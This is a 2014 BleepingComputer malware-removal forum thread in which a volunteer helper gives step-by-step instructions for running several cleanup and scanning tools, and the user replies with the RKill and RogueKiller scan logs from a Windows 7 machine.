The system needed a reboot.

==== End of Fixlog ====



#6 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:11:41 PM

Posted 05 November 2014 - 06:34 PM

Ok, it's time to check for leftovers:

 

 

STEP 1

 

 

  • Please download RKill by Grinler from the link below and save it to your desktop.

    Rkill
  • Before we begin, you should disable your anti-malware softwares you have installed so they do not interfere RKill running as some anti-malware softwares detect RKill as malicious. Please refer to this page if you are not sure how.
  • Double-click on Rkill on your desktop to run it. (If you are using Windows Vista, please right-click on it and select Run As Administrator)
  • A black screen will appear and then disappear. Please do not worry, that is normal. This means that the tool has been successfully executed.
  • If nothing happens or if the tool does not run, please let me know in your next reply.
  • A log pops up at the end of the run. This log file is located at C:\rkill.log.
  • Please post the log in your next reply.

 

 

STEP 2

 

 

  • Please download RogueKillerX64.exe and save to the desktop.
  • Close all windows and browsers
  • Right-click the program and select 'Run as Administrator'
  • Wait for the prescan to complete and then press the Scan button.
  • When done press the Report button.
  • Please copy and past the results in your next reply.

 

 

STEP 3
 

 

Please download the latest version of TDSSKiller from here and save it to your Desktop.

  • Doubleclick on TDSSKiller.exe to run the application, then click on Change parameters.
     
  • Put a checkmark beside loaded modules.
    Sbf88.png
  • A reboot will be needed to apply the changes. Do it.
  • TDSSKiller will launch automatically after the reboot. Also your computer may seem very slow and unusable. This is normal. Give it enough time to load your background programs.
  • Then click on Change parameters in TDSSKiller.
  • Check all boxes then click OK.
     
  • Click the Start Scan button.
     
  • The scan should take no longer than 2 minutes.
  • If a suspicious object is detected, the default action will be Skip, click on Continue.
     
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
    Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.

    Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
  • A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and past the results at pastebin.com and post the link to the log in your next reply.

 

 

STEP 4

 

 

Please download Malwarebytes Anti-Malware 2.0.3.1025 Final to your desktop.
 

  • Double-click mbam-setup-2.0.3.1025.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
  • Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • With some infections, you may see this message box.
    • 'Could not load DDA driver'
  • Click 'Yes' to this message, to allow the driver to load after a restart.
  • Allow the computer to restart. Continue with the rest of these instructions.
  • When the scan is complete, click Apply Actions.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

 

 

STEP 5

 

 

1.Please download HitmanPro.

  • For 32-bit Operating System - dEMD6.gif.
  • This is the mirror - dEMD6.gif
  • For 64-bit Operating System - dEMD6.gif
  • This is the mirror - dEMD6.gif

2.Launch the program by double clicking on the 5vo5F.jpg icon. (Windows Vista/7 users right click on the HitmanPro icon and select run as administrator).

Note: If the program won't run please then open the program while holding down the left CTRL key until the program is loaded.

3.Click on the next button. You must agree with the terms of EULA. (if asked)

4.Check the box beside "No, I only want to perform a one-time scan to check this computer".

5.Click on the next button.

6.The program will start to scan the computer. The scan will typically take no more than 2-3 minutes.

7.When the scan is done click on drop-down menu of the found entries (if any) and choose - Apply to all => Ignore <= IMPORTANT!!!
 
8.Click on the next button.

9.Click on the "Save Log" button.

10.Save that file to your desktop and post the content of that file in your next reply.
 
Note: if there isn't a dropdown menu when the scan is done then please don't delete anything and close HitmanPro

Navigate to C:\ProgramData\HitmanPro\Logs open the report and copy and paste it to your next reply.

 

 

 

STEP 6

 

 

logo.png
Please download Powelikscleaner (by ESET) and save it to your Desktop.

  • Double-click ESETPoweliksCleaner.exe to start the tool.
  • Read the terms of the End-user license agreement and click Agree if you agree to them.
  • The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it.
  • If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed. Press any key to exit the tool and reboot your PC.
  • The tool will produce a log in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

1.png
2.png

 

 

 

STEP 7

 

 

Download Security Check by screen317 from here.

  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

 

and then if there aren't any issues left I'll give you my final recommendations. :)

 

 

Regards,

Georgi


cXfZ4wS.png


#7 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:03:41 PM

Posted 06 November 2014 - 08:29 AM

Rkill 2.6.8 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 11/06/2014 08:26:03 AM in x64 mode.
Windows Version: Windows 7 Professional Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * C:\Users\boylem1\AppData\Local\NEC\UC700\NUvshost.exe (PID: 3148) [UP-HEUR]
 * C:\Users\boylem1\AppData\Local\NEC\UC700\UC700.exe (PID: 3296) [UP-HEUR]

2 proccesses terminated!

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * Windows Defender Disabled

   [HKLM\SOFTWARE\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001

Checking Windows Service Integrity:

 * Windows Defender (WinDefend) is not Running.
   Startup Type set to: Manual

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * No issues found.

Program finished at: 11/06/2014 08:26:30 AM
Execution time: 0 hours(s), 0 minute(s), and 27 seconds(s)
 



#8 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:03:41 PM

Posted 06 November 2014 - 09:21 AM

RogueKiller V10.0.4.0 (x64) [Oct 29 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : boylem1 [Administrator]
Mode : Scan -- Date : 11/06/2014  08:43:53

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 24 ¤¤¤
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-19809612-450918713-1538882281-8083\Software\Microsoft\Windows\CurrentVersion\Run | Nuvshot.exe : C:\Users\boylem1\AppData\Local\NEC\UC700\Nuvshost.exe  -> Found
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-19809612-450918713-1538882281-8083\Software\Microsoft\Windows\CurrentVersion\Run | UC700.exe : C:\Users\boylem1\AppData\Local\NEC\UC700\UC700.exe -SystemStartup  -> Found
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-19809612-450918713-1538882281-8083\Software\Microsoft\Windows\CurrentVersion\Run | Nuvshot.exe : C:\Users\boylem1\AppData\Local\NEC\UC700\Nuvshost.exe  -> Found
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-19809612-450918713-1538882281-8083\Software\Microsoft\Windows\CurrentVersion\Run | UC700.exe : C:\Users\boylem1\AppData\Local\NEC\UC700\UC700.exe -SystemStartup  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{30C9AE5C-47A3-4545-9E0F-2B223B9DC1FF} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{30C9AE5C-47A3-4545-9E0F-2B223B9DC1FF} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{30C9AE5C-47A3-4545-9E0F-2B223B9DC1FF} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-19809612-450918713-1538882281-39007\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-19809612-450918713-1538882281-39007\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-19809612-450918713-1538882281-8083\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-19809612-450918713-1538882281-8083\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-477433998-1779247633-678227546-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-477433998-1779247633-678227546-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-477433998-1779247633-678227546-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-477433998-1779247633-678227546-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 103 (Driver: Loaded) ¤¤¤
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtTerminateProcess : C:\Windows\System32\SYSFER.DLL @ 0x75369e19 (jmp 0xfffffffffdb195a9)
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtMapViewOfSection : C:\Windows\System32\SYSFER.DLL @ 0x75369c39 (jmp 0xfffffffffdb19409)
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtDeleteValueKey : C:\Windows\System32\SYSFER.DLL @ 0x75369bfd (jmp 0xfffffffffdb18abd)
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtCreateKey : C:\Windows\System32\SYSFER.DLL @ 0x75369b49 (jmp 0xfffffffffdb193c9)
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtSetValueKey : C:\Windows\System32\SYSFER.DLL @ 0x75369ddd (jmp 0xfffffffffdb1922d)
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtSetInformationFile : C:\Windows\System32\SYSFER.DLL @ 0x75369da1 (jmp 0xfffffffffdb19581)
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtCreateUserProcess : C:\Windows\System32\SYSFER.DLL @ 0x75369b85 (jmp 0xfffffffffdb18b05)
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtDeleteKey : C:\Windows\System32\SYSFER.DLL @ 0x75369d29 (jmp 0xfffffffffdb18c19)
[IAT:Inl] (explorer.exe @ kernel32.dll) ntdll.dll - NtOpenKeyEx : C:\Windows\System32\SYSFER.DLL @ 0x75369ced (jmp 0xfffffffffdb187ed)
[IAT:Inl] (explorer.exe @ KERNELBASE.dll) ntdll.dll - NtSetInformationFile : C:\Windows\System32\SYSFER.DLL @ 0x75369da1 (jmp 0xfffffffffdb19581)
[IAT:Inl] (explorer.exe @ KERNELBASE.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ KERNELBASE.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ KERNELBASE.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ KERNELBASE.dll) ntdll.dll - NtMapViewOfSection : C:\Windows\System32\SYSFER.DLL @ 0x75369c39 (jmp 0xfffffffffdb19409)
[IAT:Inl] (explorer.exe @ KERNELBASE.dll) ntdll.dll - NtTerminateProcess : C:\Windows\System32\SYSFER.DLL @ 0x75369e19 (jmp 0xfffffffffdb195a9)
[IAT:Inl] (explorer.exe @ KERNELBASE.dll) ntdll.dll - NtTerminateThread : C:\Windows\System32\SYSFER.DLL @ 0x75369e55 (jmp 0xfffffffffdb19375)
[IAT:Inl] (explorer.exe @ KERNELBASE.dll) ntdll.dll - NtSetValueKey : C:\Windows\System32\SYSFER.DLL @ 0x75369ddd (jmp 0xfffffffffdb1922d)
[IAT:Inl] (explorer.exe @ KERNELBASE.dll) ntdll.dll - NtCreateKey : C:\Windows\System32\SYSFER.DLL @ 0x75369b49 (jmp 0xfffffffffdb193c9)
[IAT:Inl] (explorer.exe @ KERNELBASE.dll) ntdll.dll - NtDeleteKey : C:\Windows\System32\SYSFER.DLL @ 0x75369d29 (jmp 0xfffffffffdb18c19)
[IAT:Inl] (explorer.exe @ KERNELBASE.dll) ntdll.dll - NtDeleteValueKey : C:\Windows\System32\SYSFER.DLL @ 0x75369bfd (jmp 0xfffffffffdb18abd)
[IAT:Inl] (explorer.exe @ ADVAPI32.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ ADVAPI32.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ ADVAPI32.dll) ntdll.dll - NtCreateKey : C:\Windows\System32\SYSFER.DLL @ 0x75369b49 (jmp 0xfffffffffdb193c9)
[IAT:Inl] (explorer.exe @ ADVAPI32.dll) ntdll.dll - NtSetValueKey : C:\Windows\System32\SYSFER.DLL @ 0x75369ddd (jmp 0xfffffffffdb1922d)
[IAT:Inl] (explorer.exe @ ADVAPI32.dll) ntdll.dll - NtDeleteKey : C:\Windows\System32\SYSFER.DLL @ 0x75369d29 (jmp 0xfffffffffdb18c19)
[IAT:Inl] (explorer.exe @ ADVAPI32.dll) ntdll.dll - NtTerminateThread : C:\Windows\System32\SYSFER.DLL @ 0x75369e55 (jmp 0xfffffffffdb19375)
[IAT:Inl] (explorer.exe @ ADVAPI32.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ ADVAPI32.dll) ntdll.dll - NtRenameKey : C:\Windows\System32\SYSFER.DLL @ 0x75369d65 (jmp 0xfffffffffdb183d5)
[IAT:Inl] (explorer.exe @ ADVAPI32.dll) ntdll.dll - NtOpenKeyEx : C:\Windows\System32\SYSFER.DLL @ 0x75369ced (jmp 0xfffffffffdb187ed)
[IAT:Inl] (explorer.exe @ sechost.dll) ntdll.dll - NtTerminateProcess : C:\Windows\System32\SYSFER.DLL @ 0x75369e19 (jmp 0xfffffffffdb195a9)
[IAT:Inl] (explorer.exe @ RPCRT4.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ RPCRT4.dll) ntdll.dll - NtSetInformationFile : C:\Windows\System32\SYSFER.DLL @ 0x75369da1 (jmp 0xfffffffffdb19581)
[IAT:Inl] (explorer.exe @ GDI32.dll) ntdll.dll - NtMapViewOfSection : C:\Windows\System32\SYSFER.DLL @ 0x75369c39 (jmp 0xfffffffffdb19409)
[IAT:Inl] (explorer.exe @ GDI32.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ GDI32.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ USER32.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ USER32.dll) ntdll.dll - NtCreateKey : C:\Windows\System32\SYSFER.DLL @ 0x75369b49 (jmp 0xfffffffffdb193c9)
[IAT:Inl] (explorer.exe @ USER32.dll) ntdll.dll - NtSetValueKey : C:\Windows\System32\SYSFER.DLL @ 0x75369ddd (jmp 0xfffffffffdb1922d)
[IAT:Inl] (explorer.exe @ USER32.dll) ntdll.dll - NtDeleteValueKey : C:\Windows\System32\SYSFER.DLL @ 0x75369bfd (jmp 0xfffffffffdb18abd)
[IAT:Inl] (explorer.exe @ SHELL32.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ SHELL32.dll) ntdll.dll - NtSetInformationFile : C:\Windows\System32\SYSFER.DLL @ 0x75369da1 (jmp 0xfffffffffdb19581)
[IAT:Inl] (explorer.exe @ SHELL32.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ ole32.dll) ntdll.dll - ZwOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ ole32.dll) ntdll.dll - ZwCreateKey : C:\Windows\System32\SYSFER.DLL @ 0x75369b49 (jmp 0xfffffffffdb193c9)
[IAT:Inl] (explorer.exe @ ole32.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ ole32.dll) ntdll.dll - NtMapViewOfSection : C:\Windows\System32\SYSFER.DLL @ 0x75369c39 (jmp 0xfffffffffdb19409)
[IAT:Inl] (explorer.exe @ ole32.dll) ntdll.dll - ZwDeleteValueKey : C:\Windows\System32\SYSFER.DLL @ 0x75369bfd (jmp 0xfffffffffdb18abd)
[IAT:Inl] (explorer.exe @ ole32.dll) ntdll.dll - ZwDeleteKey : C:\Windows\System32\SYSFER.DLL @ 0x75369d29 (jmp 0xfffffffffdb18c19)
[IAT:Inl] (explorer.exe @ ole32.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ ole32.dll) ntdll.dll - NtTerminateProcess : C:\Windows\System32\SYSFER.DLL @ 0x75369e19 (jmp 0xfffffffffdb195a9)
[IAT:Inl] (explorer.exe @ ole32.dll) ntdll.dll - NtSetInformationFile : C:\Windows\System32\SYSFER.DLL @ 0x75369da1 (jmp 0xfffffffffdb19581)
[IAT:Inl] (explorer.exe @ MSCTF.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ MSCTF.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ SETUPAPI.dll) ntdll.dll - NtSetInformationFile : C:\Windows\System32\SYSFER.DLL @ 0x75369da1 (jmp 0xfffffffffdb19581)
[IAT:Inl] (explorer.exe @ dwmapi.dll) ntdll.dll - NtMapViewOfSection : C:\Windows\System32\SYSFER.DLL @ 0x75369c39 (jmp 0xfffffffffdb19409)
[IAT:Inl] (explorer.exe @ Secur32.dll) ntdll.dll - NtMapViewOfSection : C:\Windows\System32\SYSFER.DLL @ 0x75369c39 (jmp 0xfffffffffdb19409)
[IAT:Inl] (explorer.exe @ WINSTA.dll) ntdll.dll - NtTerminateProcess : C:\Windows\System32\SYSFER.DLL @ 0x75369e19 (jmp 0xfffffffffdb195a9)
[IAT:Inl] (explorer.exe @ CRYPTBASE.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ apphelp.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ apphelp.dll) ntdll.dll - NtDeleteFile : C:\Windows\System32\SYSFER.DLL @ 0x75369bc1 (jmp 0xfffffffffdb18ac1)
[IAT:Inl] (explorer.exe @ apphelp.dll) ntdll.dll - NtMapViewOfSection : C:\Windows\System32\SYSFER.DLL @ 0x75369c39 (jmp 0xfffffffffdb19409)
[IAT:Inl] (explorer.exe @ apphelp.dll) ntdll.dll - NtDeleteValueKey : C:\Windows\System32\SYSFER.DLL @ 0x75369bfd (jmp 0xfffffffffdb18abd)
[IAT:Inl] (explorer.exe @ apphelp.dll) ntdll.dll - NtCreateKey : C:\Windows\System32\SYSFER.DLL @ 0x75369b49 (jmp 0xfffffffffdb193c9)
[IAT:Inl] (explorer.exe @ apphelp.dll) ntdll.dll - NtSetValueKey : C:\Windows\System32\SYSFER.DLL @ 0x75369ddd (jmp 0xfffffffffdb1922d)
[IAT:Inl] (explorer.exe @ apphelp.dll) ntdll.dll - NtDeleteKey : C:\Windows\System32\SYSFER.DLL @ 0x75369d29 (jmp 0xfffffffffdb18c19)
[IAT:Inl] (explorer.exe @ apphelp.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ apphelp.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ CSCDLL.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ CSCAPI.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ ntshrui.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ srvcli.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ rsaenh.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ rsaenh.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ ntmarta.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ ntmarta.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ CRYPT32.dll) ntdll.dll - NtCreateKey : C:\Windows\System32\SYSFER.DLL @ 0x75369b49 (jmp 0xfffffffffdb193c9)
[IAT:Inl] (explorer.exe @ CRYPT32.dll) ntdll.dll - NtOpenKeyEx : C:\Windows\System32\SYSFER.DLL @ 0x75369ced (jmp 0xfffffffffdb187ed)
[IAT:Inl] (explorer.exe @ ksuser.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ AVRT.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ AVRT.dll) ntdll.dll - NtTerminateProcess : C:\Windows\System32\SYSFER.DLL @ 0x75369e19 (jmp 0xfffffffffdb195a9)
[IAT:Inl] (explorer.exe @ netutils.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ sfc_os.DLL) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ netshell.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ IPHLPAPI.DLL) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ NSI.dll) ntdll.dll - NtTerminateProcess : C:\Windows\System32\SYSFER.DLL @ 0x75369e19 (jmp 0xfffffffffdb195a9)
[IAT:Inl] (explorer.exe @ WS2_32.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ WS2_32.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ dhcpcsvc.DLL) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ gameux.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ gameux.dll) ntdll.dll - NtMapViewOfSection : C:\Windows\System32\SYSFER.DLL @ 0x75369c39 (jmp 0xfffffffffdb19409)
[IAT:Inl] (explorer.exe @ gameux.dll) ntdll.dll - NtOpenKey : C:\Windows\System32\SYSFER.DLL @ 0x75369cb1 (jmp 0xfffffffffdb195e1)
[IAT:Inl] (explorer.exe @ gameux.dll) ntdll.dll - NtDeleteFile : C:\Windows\System32\SYSFER.DLL @ 0x75369bc1 (jmp 0xfffffffffdb18ac1)
